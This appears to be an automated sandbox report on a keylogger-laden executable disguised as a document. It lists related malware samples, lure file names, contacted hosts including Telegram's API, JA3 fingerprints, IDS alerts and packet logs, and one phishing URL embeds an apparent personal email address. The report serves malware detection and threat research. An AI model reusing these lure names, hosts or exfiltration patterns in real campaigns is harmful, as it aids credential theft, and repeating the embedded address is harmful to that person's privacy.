	REQUEST FOR QUOTATION 1307-RFQ.exe	Get hash	malicious	MassLogger RAT	Browse
	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Get hash	malicious	VIP Keylogger	Browse
104.21.67.152	hesaphareketi-01.pdf.exe	Get hash	malicious	Snake Keylogger	Browse
	Justificante pago-09453256434687.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse
	pedido-035241.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse
	QUOTATION REQUEST - BQS058.exe	Get hash	malicious	MassLogger RAT	Browse
	FT876567090.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	ref_97024130865.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse
	CITAS_pif.exe	Get hash	malicious	MassLogger RAT	Browse
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exe	Get hash	malicious	GuLoader	Browse
	SWIFT091816-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
193.122.130.0	PURCHASE ORDER TRC-0909718-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	ref_97024130865.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	SWIFT09181-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	file.exe	Get hash	malicious	Amadey, AsyncRAT, HVNC, LummaC Stealer, RedLine, Stealc	Browse	checkip.dyndns.org/
	AsyncClient.exe	Get hash	malicious	AsyncRAT, HVNC, PureLog Stealer	Browse	checkip.dyndns.org/
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	T#U00fcbitak SAGE RfqF#U0334D#U0334P#U0334..exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Malzeme #U0130stek Formu_12102024.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
checkip.dyndns.com	hesaphareketi-01.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	PURCHASE ORDER TRC-0909718-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	193.122.130.0
	Justificante pago-09453256434687.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	pedido-035241.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	QUOTATION REQUEST - BQS058.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	FT876567090.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	REQUEST FOR QUOTATION 1307-RFQ.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Get hash	malicious	VIP Keylogger	Browse	132.226.8.169
	ref_97024130865.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.130.0
	CITAS_pif.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
reallyfreegeoip.org	hesaphareketi-01.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	PURCHASE ORDER TRC-0909718-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	188.114.97.3
	Justificante pago-09453256434687.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	pedido-035241.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	QUOTATION REQUEST - BQS058.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	FT876567090.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	REQUEST FOR QUOTATION 1307-RFQ.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134
	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Get hash	malicious	VIP Keylogger	Browse	172.67.177.134
	ref_97024130865.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.67.152
	CITAS_pif.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
api.telegram.org	Order129845.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	PURCHASE ORDER TRC-0909718-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	Justificante pago-09453256434687.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	l9IH82eiKw.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	l9IH82eiKw.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	pedido-035241.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	QUOTATION REQUEST - BQS058.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	FT876567090.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	REQUEST FOR QUOTATION 1307-RFQ.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Get hash	malicious	VIP Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	69633f.msi	Get hash	malicious	Vidar	Browse	149.154.167.99
	Order129845.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	PURCHASE ORDER TRC-0909718-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	Justificante pago-09453256434687.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	l9IH82eiKw.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	l9IH82eiKw.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	pedido-035241.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	dZKPE9gotO.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	QUOTATION REQUEST - BQS058.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	FT876567090.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
CLOUDFLARENETUS	https://quarantine-emails13122024bcpe038qua8303rantine0832411.s3.eu-central-3.ionoscloud.com/message.html#anneke.hanekom@mmiholdings.co.za	Get hash	malicious	HTMLPhisher	Browse	104.18.11.207
	Assinar_PDF_3476.lNK.lnk	Get hash	malicious	Unknown	Browse	104.21.32.1
	hesaphareketi-01.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	Sublabially.vbs	Get hash	malicious	Remcos, GuLoader	Browse	172.67.210.11
	Brokerage Invoice.pdf.vbs	Get hash	malicious	Unknown	Browse	104.21.2.70
	DHL.exe	Get hash	malicious	FormBook	Browse	104.21.48.233
	SFHgtxFGtB.ps1	Get hash	malicious	Unknown	Browse	104.21.87.65
	DG55Gu1yGM.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	he55PbvM2G.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	fsg5PWtTm2.lnk	Get hash	malicious	RedLine, SectopRAT	Browse	104.21.87.65
ORACLE-BMC-31898US	ldr.ps1	Get hash	malicious	GO Miner, Xmrig	Browse	147.154.227.160
	PURCHASE ORDER TRC-0909718-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	193.122.130.0
	end.exe	Get hash	malicious	Unknown	Browse	130.61.86.87
	Justificante pago-09453256434687.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	pedido-035241.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	QUOTATION REQUEST - BQS058.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	FT876567090.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	REQUEST FOR QUOTATION 1307-RFQ.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	ref_97024130865.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.130.0
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	hesaphareketi-01.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	PURCHASE ORDER TRC-0909718-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.67.152
	Justificante pago-09453256434687.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	pedido-035241.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	QUOTATION REQUEST - BQS058.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	FT876567090.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	REQUEST FOR QUOTATION 1307-RFQ.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Get hash	malicious	VIP Keylogger	Browse	104.21.67.152
	ref_97024130865.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.67.152
	CITAS_pif.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
3b5074b1b5d032e5620f69f9f700ff0e	https://quarantine-emails13122024bcpe038qua8303rantine0832411.s3.eu-central-3.ionoscloud.com/message.html#anneke.hanekom@mmiholdings.co.za	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	Sublabially.vbs	Get hash	malicious	Remcos, GuLoader	Browse	149.154.167.220
	Brokerage Invoice.pdf.vbs	Get hash	malicious	Unknown	Browse	149.154.167.220
	Nueva orden de compra-836528268278278.xlsx.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	Order129845.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	SFHgtxFGtB.ps1	Get hash	malicious	Unknown	Browse	149.154.167.220
	Nueva orden de compra-836528268278278.xlsx.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	fsg5PWtTm2.lnk	Get hash	malicious	RedLine, SectopRAT	Browse	149.154.167.220
	seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	149.154.167.220
	sweetnesswithgreatnessiwthbestthingswithmebackickmegreatthings.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	149.154.167.220

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.6599547231656377
Encrypted:	false
SSDEEP:	3:NlllulRlltl:NllU
MD5:	2AAC5546A51052C82C51A111418615EB
SHA1:	14CFBEF3B3D238893C68F1BD6FE985DACF1953F1
SHA-256:	DBBA7151765EDB3661C0B1AD08037C0BDDC43227D2F2E8DDAC33C4A1E7C4151F
SHA-512:	1273F4B0365E213134E7FBC3BE45CAC33CB32AB6CED85479905C702F0429A0491A5E9C878E5FEFFA05BB0D1AA7F704949D13DD1DA9FCEB93665F1CC110FB24B8
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b4yzgacq.uze.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o1xyklf3.dpw.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.647965004518438
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe
File size:	906'240 bytes
MD5:	bf49fb7c260b15a61c5849a49fdee343
SHA1:	059f7b0a2d5f6b18a06f9ccd2995a7ecb9d69b14
SHA256:	4733c3841f338c4b95b5226678de7358eaf8604750ee3aa3c3d55ce829db11b3
SHA512:	325b8b7c2337493a69160532187177cd8c1bdb0bf341738d1f980f0367fbf68b20693c45721fc9bdf24d5552dfbe144f81607bb5aa68bd778a6e4851f826c938
SSDEEP:	12288:PM8dqyq2Kn6B6L/U0uQMf0zR6B8e40fh4E7joIHMopRdeCiL3Oc7mMPku+l0CPP+:kE9BGM0Sf+6arU7jPfvbiL+cZPd+p+
TLSH:	2015BFC03B3AB701CD6CA6708936EDB813652E746040F9E66DDE27D7769DB126E08F06
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...1.ag..............0.................. ........@.. .......................@............@................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x4de71e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x67611D31 [Tue Dec 17 06:41:53 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xde6c9	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xe0000	0x608	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xe2000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xdc43c	0x54	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xdc724	0xdc800	7d9697c436c000d4e7b8e25ca64d46d9	False	0.8021364795918368	data	7.655093124415781	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xe0000	0x608	0x800	c6d34a620898961b393db51c07d01e3d	False	0.33447265625	data	3.4076192556520994	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xe2000	0xc	0x200	81879ea24aa364ec3618bdbbc5cde152	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xe0090	0x378	data			0.4313063063063063
RT_MANIFEST	0xe0418	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-17T08:33:12.799786+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49733	193.122.130.0	80	TCP
2024-12-17T08:33:15.515581+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49733	193.122.130.0	80	TCP
2024-12-17T08:33:17.134618+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49736	104.21.67.152	443	TCP
2024-12-17T08:33:18.421884+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49738	193.122.130.0	80	TCP
2024-12-17T08:33:20.067027+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49739	104.21.67.152	443	TCP
2024-12-17T08:33:21.343965+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49740	193.122.130.0	80	TCP
2024-12-17T08:33:23.020648+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49741	104.21.67.152	443	TCP
2024-12-17T08:33:26.024751+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49744	104.21.67.152	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 17, 2024 08:33:11.204437971 CET	49733	80	192.168.2.4	193.122.130.0
Dec 17, 2024 08:33:11.324187994 CET	80	49733	193.122.130.0	192.168.2.4
Dec 17, 2024 08:33:11.324317932 CET	49733	80	192.168.2.4	193.122.130.0
Dec 17, 2024 08:33:11.324584007 CET	49733	80	192.168.2.4	193.122.130.0
Dec 17, 2024 08:33:11.444205999 CET	80	49733	193.122.130.0	192.168.2.4
Dec 17, 2024 08:33:12.430684090 CET	80	49733	193.122.130.0	192.168.2.4
Dec 17, 2024 08:33:12.435235977 CET	49733	80	192.168.2.4	193.122.130.0
Dec 17, 2024 08:33:12.554932117 CET	80	49733	193.122.130.0	192.168.2.4
Dec 17, 2024 08:33:12.755407095 CET	80	49733	193.122.130.0	192.168.2.4
Dec 17, 2024 08:33:12.799786091 CET	49733	80	192.168.2.4	193.122.130.0
Dec 17, 2024 08:33:13.083458900 CET	49734	443	192.168.2.4	104.21.67.152
Dec 17, 2024 08:33:13.083483934 CET	443	49734	104.21.67.152	192.168.2.4
Dec 17, 2024 08:33:13.083627939 CET	49734	443	192.168.2.4	104.21.67.152
Dec 17, 2024 08:33:13.165327072 CET	49734	443	192.168.2.4	104.21.67.152
Dec 17, 2024 08:33:13.165335894 CET	443	49734	104.21.67.152	192.168.2.4
Dec 17, 2024 08:33:14.394711018 CET	443	49734	104.21.67.152	192.168.2.4
Dec 17, 2024 08:33:14.394805908 CET	49734	443	192.168.2.4	104.21.67.152
Dec 17, 2024 08:33:14.399102926 CET	49734	443	192.168.2.4	104.21.67.152
Dec 17, 2024 08:33:14.399132967 CET	443	49734	104.21.67.152	192.168.2.4
Dec 17, 2024 08:33:14.399529934 CET	443	49734	104.21.67.152	192.168.2.4
Dec 17, 2024 08:33:14.451771975 CET	49734	443	192.168.2.4	104.21.67.152
Dec 17, 2024 08:33:14.499331951 CET	443	49734	104.21.67.152	192.168.2.4
Dec 17, 2024 08:33:14.829905033 CET	443	49734	104.21.67.152	192.168.2.4
Dec 17, 2024 08:33:14.830053091 CET	443	49734	104.21.67.152	192.168.2.4
Dec 17, 2024 08:33:14.830214977 CET	49734	443	192.168.2.4	104.21.67.152
Dec 17, 2024 08:33:14.835867882 CET	49734	443	192.168.2.4	104.21.67.152
Dec 17, 2024 08:33:14.839340925 CET	49733	80	192.168.2.4	193.122.130.0
Dec 17, 2024 08:33:14.959100962 CET	80	49733	193.122.130.0	192.168.2.4
Dec 17, 2024 08:33:15.463963032 CET	80	49733	193.122.130.0	192.168.2.4
Dec 17, 2024 08:33:15.465989113 CET	49736	443	192.168.2.4	104.21.67.152
Dec 17, 2024 08:33:15.466029882 CET	443	49736	104.21.67.152	192.168.2.4
Dec 17, 2024 08:33:15.466192961 CET	49736	443	192.168.2.4	104.21.67.152
Dec 17, 2024 08:33:15.466465950 CET	49736	443	192.168.2.4	104.21.67.152
Dec 17, 2024 08:33:15.466480970 CET	443	49736	104.21.67.152	192.168.2.4
Dec 17, 2024 08:33:15.515580893 CET	49733	80	192.168.2.4	193.122.130.0
Dec 17, 2024 08:33:16.687963963 CET	443	49736	104.21.67.152	192.168.2.4
Dec 17, 2024 08:33:16.689599037 CET	49736	443	192.168.2.4	104.21.67.152
Dec 17, 2024 08:33:16.689627886 CET	443	49736	104.21.67.152	192.168.2.4
Dec 17, 2024 08:33:17.134727001 CET	443	49736	104.21.67.152	192.168.2.4
Dec 17, 2024 08:33:17.134888887 CET	443	49736	104.21.67.152	192.168.2.4
Dec 17, 2024 08:33:17.134982109 CET	49736	443	192.168.2.4	104.21.67.152
Dec 17, 2024 08:33:17.135339975 CET	49736	443	192.168.2.4	104.21.67.152
Dec 17, 2024 08:33:17.138681889 CET	49733	80	192.168.2.4	193.122.130.0
Dec 17, 2024 08:33:17.139791012 CET	49738	80	192.168.2.4	193.122.130.0
Dec 17, 2024 08:33:17.258850098 CET	80	49733	193.122.130.0	192.168.2.4
Dec 17, 2024 08:33:17.258919954 CET	49733	80	192.168.2.4	193.122.130.0
Dec 17, 2024 08:33:17.259809971 CET	80	49738	193.122.130.0	192.168.2.4
Dec 17, 2024 08:33:17.259917974 CET	49738	80	192.168.2.4	193.122.130.0
Dec 17, 2024 08:33:17.260054111 CET	49738	80	192.168.2.4	193.122.130.0
Dec 17, 2024 08:33:17.379745007 CET	80	49738	193.122.130.0	192.168.2.4
Dec 17, 2024 08:33:18.369180918 CET	80	49738	193.122.130.0	192.168.2.4
Dec 17, 2024 08:33:18.370404959 CET	49739	443	192.168.2.4	104.21.67.152
Dec 17, 2024 08:33:18.370450020 CET	443	49739	104.21.67.152	192.168.2.4
Dec 17, 2024 08:33:18.370522976 CET	49739	443	192.168.2.4	104.21.67.152
Dec 17, 2024 08:33:18.370743036 CET	49739	443	192.168.2.4	104.21.67.152
Dec 17, 2024 08:33:18.370754957 CET	443	49739	104.21.67.152	192.168.2.4
Dec 17, 2024 08:33:18.421884060 CET	49738	80	192.168.2.4	193.122.130.0
Dec 17, 2024 08:33:19.622476101 CET	443	49739	104.21.67.152	192.168.2.4
Dec 17, 2024 08:33:19.624392986 CET	49739	443	192.168.2.4	104.21.67.152
Dec 17, 2024 08:33:19.624417067 CET	443	49739	104.21.67.152	192.168.2.4
Dec 17, 2024 08:33:20.067048073 CET	443	49739	104.21.67.152	192.168.2.4
Dec 17, 2024 08:33:20.067214012 CET	443	49739	104.21.67.152	192.168.2.4
Dec 17, 2024 08:33:20.067286015 CET	49739	443	192.168.2.4	104.21.67.152
Dec 17, 2024 08:33:20.067672014 CET	49739	443	192.168.2.4	104.21.67.152
Dec 17, 2024 08:33:20.070797920 CET	49738	80	192.168.2.4	193.122.130.0
Dec 17, 2024 08:33:20.071883917 CET	49740	80	192.168.2.4	193.122.130.0
Dec 17, 2024 08:33:20.192163944 CET	80	49738	193.122.130.0	192.168.2.4
Dec 17, 2024 08:33:20.192203045 CET	80	49740	193.122.130.0	192.168.2.4
Dec 17, 2024 08:33:20.192250967 CET	49738	80	192.168.2.4	193.122.130.0
Dec 17, 2024 08:33:20.192290068 CET	49740	80	192.168.2.4	193.122.130.0
Dec 17, 2024 08:33:20.192437887 CET	49740	80	192.168.2.4	193.122.130.0
Dec 17, 2024 08:33:20.315017939 CET	80	49740	193.122.130.0	192.168.2.4
Dec 17, 2024 08:33:21.291553020 CET	80	49740	193.122.130.0	192.168.2.4
Dec 17, 2024 08:33:21.343965054 CET	49740	80	192.168.2.4	193.122.130.0
Dec 17, 2024 08:33:21.353836060 CET	49741	443	192.168.2.4	104.21.67.152
Dec 17, 2024 08:33:21.353888035 CET	443	49741	104.21.67.152	192.168.2.4
Dec 17, 2024 08:33:21.354231119 CET	49741	443	192.168.2.4	104.21.67.152
Dec 17, 2024 08:33:21.354231119 CET	49741	443	192.168.2.4	104.21.67.152
Dec 17, 2024 08:33:21.354269981 CET	443	49741	104.21.67.152	192.168.2.4
Dec 17, 2024 08:33:22.575550079 CET	443	49741	104.21.67.152	192.168.2.4
Dec 17, 2024 08:33:22.578330040 CET	49741	443	192.168.2.4	104.21.67.152
Dec 17, 2024 08:33:22.578382969 CET	443	49741	104.21.67.152	192.168.2.4
Dec 17, 2024 08:33:23.020662069 CET	443	49741	104.21.67.152	192.168.2.4
Dec 17, 2024 08:33:23.020752907 CET	443	49741	104.21.67.152	192.168.2.4
